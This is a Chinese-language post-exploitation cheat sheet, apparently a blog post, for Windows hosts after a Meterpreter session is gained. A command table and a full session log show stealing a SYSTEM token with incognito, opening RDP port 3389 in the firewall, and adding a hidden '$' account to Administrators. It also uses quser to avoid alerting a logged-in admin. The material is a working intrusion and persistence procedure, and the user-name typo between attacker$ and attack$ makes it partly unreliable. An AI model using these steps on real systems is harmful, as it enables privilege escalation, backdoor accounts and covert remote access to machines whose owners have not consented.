Windows获取到meterpreter会话后的操作
说明 | 命令 |
---|---|
查看当前用户 | getuid |
如果是低权限账号,我们先加载会话令牌模块 | use incognito |
列出会话令牌 | list_tokens -u |
发现有高权限账号令牌后盗取令牌 | impersonate_token "NT AUTHORITY\SYSTEM" |
shell乱码使用此命令 | chcp 65001 |
获取系统信息 | systeminfo |
添加防火墙规则,将3389放行 | netsh firewall add portopening protocol = TCP port = 3389 name = rdp |
添加隐藏用户 | net user attacker$ 123456 /add |
添加用户到管理组 | net localgroup Administrators attacker$ /add |
查看当前服务器 在线用户情况 | quser |
meterpreter > getuid ## 获取当前用户
Server username: SIMONF0CB\simon
meterpreter > use incognito ## 加载会话令牌模块
Loading extension incognito...Success.
meterpreter > list_tokens -u ## 列出会话令牌
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================
NT AUTHORITY\SYSTEM
SIMONF0CB\simon
Impersonation Tokens Available
========================================
No tokens available
meterpreter > impersonate_token "NT AUTHORITY\SYSTEM" ## 盗取system令牌
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid ## 成功盗取令牌,目前是最高权限(如果获取到的是administrator权限,可以通过getsystem进一步提权到system权限)
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 4980 created.
Channel 5 created.
Microsoft Windows [�汾 10.0.18363.592]
(c) 2019 Microsoft Corporation����������Ȩ���� ## 发现存在乱码
C:\Windows\system32>chcp 65001 ## 通过此命令,乱码就没了
chcp 65001
Active code page: 65001
C:\Windows\system32>systeminfo ## 通过systeminfo获取系统信息
systeminfo
Host Name: SIMONF0CB
OS Name: Microsoft Windows 10 专业工作站版
OS Version: 10.0.18363 N/A Build 18363
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: simon
C:\Windows\system32>netsh firewall add portopening protocol = TCP port = 3389 name = rdp ## 添加防火墙规则,将3389放行(如果目标机器3389无法联通的时候)
netsh firewall add portopening protocol = TCP port = 3389 name = rdp
IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .
Ok.
C:\Windows\system32>net user attacker$ 123456 /add ## 添加隐藏用户
C:\Windows\system32>net localgroup Administrators attack$ /add ## 将刚刚添加的用户加入管理员组
C:\Windows\system32>quser ## 查看当前服务器 在线用户情况(防止直接登录将管理员挤下去)
人间正道是沧桑